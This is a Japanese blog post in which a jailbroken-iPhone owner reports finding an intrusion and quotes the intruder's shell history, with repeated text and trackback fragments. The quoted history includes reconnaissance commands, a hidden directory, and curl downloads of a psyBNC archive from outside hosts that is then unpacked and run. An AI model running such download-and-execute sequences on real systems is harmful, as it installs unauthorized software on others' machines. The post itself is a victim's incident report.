-----追記ここから-----
【2010/05/23】 以下の記事をアップしました。
iPhoneの脱獄について
本当に脱獄が必要なのか良く考えた上で自己責任で実行してください。
-----追記ここまで-----
昨日Calendarのデータをいじろうと久しぶりにiPhoneにログインしたところ/var/rootの下に .a なるディレクトリーが作成されていました。
.で始まるファイル名なのでlsコマンドでも-aを付けないと表示されないのですが、普段から-laを付けているので見つけることが出来ました。
で、ディレクトリーの中を見るとpsydarwin.tgzと言うファイルとそれを展開した物が入っていました。
こんなディレクトリーを作った覚えも全くないのでおかしいと思い.bash_historyを見てみるとこんなコマンドが実行されていました。
uname -a
cat /etc/hosts
w
uptime
ps -x
mkdir .a
cd .a
curl -O http://trades.at.ua/psybnc-darwin.tgz
wget
curl
curl -O http://Linux-Help.clan.su/download/PsyBncDRWN.tgz
yum istall wget
tar zxvf psydarwin.tgz
cd psybnc
chmod +x *
sh
./psybnc
./psybnc
ls
./psybnc
chmod +x *
./psybnc
mkdir .a が実行されているのでディレクトリーのタイムスタンプを見ると12/31の23:59となっており、この時間はTVを見ていたのでiPhoneには指一本触れていませんでした。
curlなど普段は全く使わないというか、使ったことが一度もないコマンドなので誰かに触られたとしか考えられません。
rootのパスワードは変更してあるし、誰がどうやって侵入したのか全くの謎です。
これら一連のコマンドの後は見覚えのあるコマンドなので、途中であきらめたのでしょう。
実行しようとしたバイナリーはARM用にコンパイルされた物ではなかったので助かりました。
それにしても年明け早々???な出来事でした。
【2010/05/23】 以下の記事をアップしました。
iPhoneの脱獄について
本当に脱獄が必要なのか良く考えた上で自己責任で実行してください。
-----追記ここまで-----
昨日Calendarのデータをいじろうと久しぶりにiPhoneにログインしたところ/var/rootの下に .a なるディレクトリーが作成されていました。
.で始まるファイル名なのでlsコマンドでも-aを付けないと表示されないのですが、普段から-laを付けているので見つけることが出来ました。
で、ディレクトリーの中を見るとpsydarwin.tgzと言うファイルとそれを展開した物が入っていました。
こんなディレクトリーを作った覚えも全くないのでおかしいと思い.bash_historyを見てみるとこんなコマンドが実行されていました。
uname -a
cat /etc/hosts
w
uptime
ps -x
mkdir .a
cd .a
curl -O http://trades.at.ua/psybnc-darwin.tgz
wget
curl
curl -O http://Linux-Help.clan.su/download/PsyBncDRWN.tgz
yum istall wget
tar zxvf psydarwin.tgz
cd psybnc
chmod +x *
sh
./psybnc
./psybnc
ls
./psybnc
chmod +x *
./psybnc
mkdir .a が実行されているのでディレクトリーのタイムスタンプを見ると12/31の23:59となっており、この時間はTVを見ていたのでiPhoneには指一本触れていませんでした。
curlなど普段は全く使わないというか、使ったことが一度もないコマンドなので誰かに触られたとしか考えられません。
rootのパスワードは変更してあるし、誰がどうやって侵入したのか全くの謎です。
これら一連のコマンドの後は見覚えのあるコマンドなので、途中であきらめたのでしょう。
実行しようとしたバイナリーはARM用にコンパイルされた物ではなかったので助かりました。
それにしても年明け早々???な出来事でした。
この記事へのコメント
nao様
iphone.goodegg.jpのgoodeggと申します。
事後報告で恐れ入りますが当ブログ記事にて紹介させて頂きました。
この様な”生の事例”はとてもインパクトがありました!貴重な事例のご紹介ありがとう御座います。
iphone.goodegg.jpのgoodeggと申します。
事後報告で恐れ入りますが当ブログ記事にて紹介させて頂きました。
この様な”生の事例”はとてもインパクトがありました!貴重な事例のご紹介ありがとう御座います。
この記事のトラックバックURL
http://hnaokixyz.blog109.fc2.com/tb.php/71-5609b96d
この記事にトラックバックする(FC2ブログユーザー)
この記事にトラックバックする(FC2ブログユーザー)
この記事へのトラックバック
iPhoneに侵入された??? - Today’s E90
常に危険にさらされているみたい - Today’s E90
においてJailBreakenなiPhoneに侵入された事例が紹介されています。
?
無駄に不...
2009/01/22(木) 09:10:49 | iPhone.goodegg.jp
